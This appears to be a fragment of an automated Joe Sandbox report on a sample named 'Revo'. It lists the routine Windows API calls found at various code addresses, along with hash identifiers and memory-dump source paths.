                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeMessageSendUninitialize
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2896919175-0
                                                                                                                                              • Opcode ID: 691039c818a67b31f98599bc9a66305e369ba1548cb07ccd7a3140e409cbdcf5
                                                                                                                                              • Instruction ID: 75974562a342b4767595fe941f1b5a5caa8115d748db5a0a183e84b8e7df0fb7
                                                                                                                                              • Opcode Fuzzy Hash: 691039c818a67b31f98599bc9a66305e369ba1548cb07ccd7a3140e409cbdcf5
                                                                                                                                              • Instruction Fuzzy Hash: 71F090739015008AE74177A5AD01B2677A4EB98709F06847AEFC4B22B0E7B948118E5E
                                                                                                                                              APIs
                                                                                                                                              • CreateDirectoryW.KERNEL32(00481000,?), ref: 00405C38
                                                                                                                                              • GetLastError.KERNEL32 ref: 00405C46
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1375471231-0
                                                                                                                                              • Opcode ID: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
                                                                                                                                              • Instruction ID: 25e10c4fac4d698a59efea960107f93253b8ac9e3b964bd1d6400c706bcc644c
                                                                                                                                              • Opcode Fuzzy Hash: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
                                                                                                                                              • Instruction Fuzzy Hash: E6F0F4B0C04209DAEB00CFA4D9497EFBBB4BB04319F00802AD541B6281D7B882488FA9
                                                                                                                                              APIs
                                                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 00401F21
                                                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401F2C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$EnableShow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1136574915-0
                                                                                                                                              • Opcode ID: d0188487546d0aa2d07df64ecb57d90e690e89e3614f878a6311feaccaca8818
                                                                                                                                              • Instruction ID: ce97bb54dc56410027eb81a7581dc46f0de68bed8411b1f66f85bdadb8ab3b17
                                                                                                                                              • Opcode Fuzzy Hash: d0188487546d0aa2d07df64ecb57d90e690e89e3614f878a6311feaccaca8818
                                                                                                                                              • Instruction Fuzzy Hash: 7DE04876908610DFE744EBA4AE495AE73B4EF84365710097FE041F11D1D7B94D00965D
                                                                                                                                              APIs
                                                                                                                                              • DispatchMessageW.USER32(?), ref: 00406AE9
                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00406AF9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Message$DispatchPeek
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1770753511-0
                                                                                                                                              • Opcode ID: 454023410e24b941cb85301e3ae29d468fd74800f29e5bcbc5c5f96efbc0212a
                                                                                                                                              • Instruction ID: 1ddfa30a50b64daf61bbb77bbc73644e1ad8712fad2235fac67661dc563a41bf
                                                                                                                                              • Opcode Fuzzy Hash: 454023410e24b941cb85301e3ae29d468fd74800f29e5bcbc5c5f96efbc0212a
                                                                                                                                              • Instruction Fuzzy Hash: 8CE08673A01119A7CE00B6A99D05ECB777C9B95750F014036FA01F3084E674E5028AB8
                                                                                                                                              APIs
                                                                                                                                              • CreateProcessW.KERNEL32(00000000,00481000,00000000,00000000,00000000,04000000,00000000,00000000,0045A750,?,?,?,00481000,?), ref: 00405CAE
                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00481000,?), ref: 00405CBB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3712363035-0
                                                                                                                                              • Opcode ID: c45f180bea824e86b9f60da59515b64d79646989f9db2e08603b41b576f742c4
                                                                                                                                              • Instruction ID: 678fb2cce29b027916b6e9c77d741f72fc3b9667aac1924bad6fa13dfa27649e
                                                                                                                                              • Opcode Fuzzy Hash: c45f180bea824e86b9f60da59515b64d79646989f9db2e08603b41b576f742c4
                                                                                                                                              • Instruction Fuzzy Hash: E6E0BFB4500209BFFB009B64ED49F7B7B7CE704605F008525BD10F2191D774D8159A7D
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,00403775,0000000C,?,?,?,?,?,?,?,?), ref: 00406AA8
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406AC3
                                                                                                                                                • Part of subcall function 00406A26: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A3D
                                                                                                                                                • Part of subcall function 00406A26: wsprintfW.USER32 ref: 00406A78
                                                                                                                                                • Part of subcall function 00406A26: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A8C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2547128583-0
                                                                                                                                              • Opcode ID: 09a5520475afffee645b4664441d986c1138b09cf986c3d6b2a713b3520f987f
                                                                                                                                              • Instruction ID: 6883b19bcb958afdb132cd43d0a9aeb12fc85c99e1cf53eaa24744f9dd55f8c1
                                                                                                                                              • Opcode Fuzzy Hash: 09a5520475afffee645b4664441d986c1138b09cf986c3d6b2a713b3520f987f
                                                                                                                                              • Instruction Fuzzy Hash: CDE08636714611ABD210BA745E48C6777A89F86610306C83EF542F2141D734DC33AA79
                                                                                                                                              APIs
                                                                                                                                              • FreeLibrary.KERNEL32(?,76F93420,00000000,76F92EE0,00403CB6,004D1000,00403BB5,?,?,00000008,0000000A,0000000C), ref: 00403CF9
                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00403D00
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Free$GlobalLibrary
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1100898210-0
                                                                                                                                              • Opcode ID: e95d17bfaf349d732f0976dec1ca20856772db7d244860fdb52b783a83313983
                                                                                                                                              • Instruction ID: 6cc7235c82e409e594193dc40a4abc0356c386f753d5776fe34d96f63476a0b8
                                                                                                                                              • Opcode Fuzzy Hash: e95d17bfaf349d732f0976dec1ca20856772db7d244860fdb52b783a83313983
                                                                                                                                              • Instruction Fuzzy Hash: 2DE012334151305BD6225F59FE0575ABB68BF45F22F05C52FE940BB2A18BB85C424FD8
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesW.KERNEL32(00000003,00403138,004D9000,80000000,00000003), ref: 00406196
                                                                                                                                              • CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$AttributesCreate
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 415043291-0
                                                                                                                                              • Opcode ID: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                                                                                                              • Instruction ID: be52236ca1bfc2e7009fe271a1dfd41440a2a0d1ebc26b2cb4c8630358080456
                                                                                                                                              • Opcode Fuzzy Hash: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                                                                                                              • Instruction Fuzzy Hash: 30D09E31254301EFFF098F20DE16F2EBAA2EB94B00F11952CB682941E0DA715819DB15
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesW.KERNEL32(?,?,00405D72,?,?,00000000,00405F48,?,?,?,?), ref: 00406172
                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406186
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                              • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                                                                                              • Instruction ID: 83b49fe15d4d51a1c27b4b8da2ab4689423c6710ab607d501633f61f971848cf
                                                                                                                                              • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                                                                                              • Instruction Fuzzy Hash: 63D0C972504220BFC2102728AE0889BBB55DB552717028A35FCA9A22B0CB314C6A86A4
                                                                                                                                              APIs
                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,00403658,004D1000,004D1000,004D1000,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 00405C56
                                                                                                                                              • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405C64
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1375471231-0
                                                                                                                                              • Opcode ID: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                                                                                                              • Instruction ID: 868687b2a80a8d4cb6d5034857ca3092976d2c25b2f3b55ea206b3a8d14aaeda
                                                                                                                                              • Opcode Fuzzy Hash: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                                                                                                              • Instruction Fuzzy Hash: C7C04C30608701DAEA105B31DE8CB177A50BB54741F198439A582F41B0DA348555D92D
                                                                                                                                              APIs
                                                                                                                                              • CloseHandle.KERNEL32(FFFFFFFF,004D1000,00403BB5,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403C94
                                                                                                                                              • CloseHandle.KERNEL32(FFFFFFFF,004D1000,00403BB5,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403CA8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2962429428-0
                                                                                                                                              • Opcode ID: d2bdcc80eca201cd5359b13114e9f273fde289d40d32cb5243316b7ba4aee94e
                                                                                                                                              • Instruction ID: 93454ec2f84d486dd0eb46c633a3a61ffb1fb8fcaaff07e214acfe86ea83ea04
                                                                                                                                              • Opcode Fuzzy Hash: d2bdcc80eca201cd5359b13114e9f273fde289d40d32cb5243316b7ba4aee94e
                                                                                                                                              • Instruction Fuzzy Hash: 33E0863150471496D5206F7CAE4D9853B185F41335765C327F038F21F0C738D95A5AAD
                                                                                                                                              APIs
                                                                                                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 004016BB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileMove
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3562171763-0
                                                                                                                                              • Opcode ID: 68bb4f6f7371558e69e9210aa95fbfffb87ec2be4bc2e048b920f3dfebe64502
                                                                                                                                              • Instruction ID: 51a81b0a5d784a3e000b48fd00e23250cd6aa6ca0aeb3385d4825347e3700de9
                                                                                                                                              • Opcode Fuzzy Hash: 68bb4f6f7371558e69e9210aa95fbfffb87ec2be4bc2e048b920f3dfebe64502
                                                                                                                                              • Instruction Fuzzy Hash: A9F09031608112A3CB10B7B55F0ED9F26949F8136CB30463FB112B21E1D6BC8A02966E
                                                                                                                                              APIs
                                                                                                                                              • SetFilePointer.KERNEL32(00000000,?,00000000,?,?), ref: 004028D4
                                                                                                                                                • Part of subcall function 004065E9: wsprintfW.USER32 ref: 004065F6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FilePointerwsprintf
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 327478801-0
                                                                                                                                              • Opcode ID: 87c5897e7d26168ae8e73bcafa5ed0f6671dd4abe8b22ba1c793c606c7386a0e
                                                                                                                                              • Instruction ID: 6ed73ee8f3319f68a8da4c27dc8c9ca591426a2e8a32d0aa126581893dcb710c
                                                                                                                                              • Opcode Fuzzy Hash: 87c5897e7d26168ae8e73bcafa5ed0f6671dd4abe8b22ba1c793c606c7386a0e
                                                                                                                                              • Instruction Fuzzy Hash: A4E06D71908104AAEB04ABA5AE59CAE7379AF94345B20443FF101F00E8C6B94D109A2D
                                                                                                                                              APIs
                                                                                                                                              • FindNextFileW.KERNELBASE(00000000,?,?), ref: 00402917
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileFindNext
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2029273394-0
                                                                                                                                              • Opcode ID: 742a5d2d02c8cd350c2a3ef58f522920eb87d0a7cd3bfa896a74a5719c09783c
                                                                                                                                              • Instruction ID: d46dfd92da6d3320027a158c46672eb634da6cf54ac1c691db46aaaef4df00ea
                                                                                                                                              • Opcode Fuzzy Hash: 742a5d2d02c8cd350c2a3ef58f522920eb87d0a7cd3bfa896a74a5719c09783c
                                                                                                                                              • Instruction Fuzzy Hash: E5E06D72A04105DBDB11DBE5DAAC9AFB3B8EF00348F20447BD102F21E1E7B98A549B19
                                                                                                                                              APIs
                                                                                                                                              • RegCreateKeyExW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E7C,00000000,?,?), ref: 00406566
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
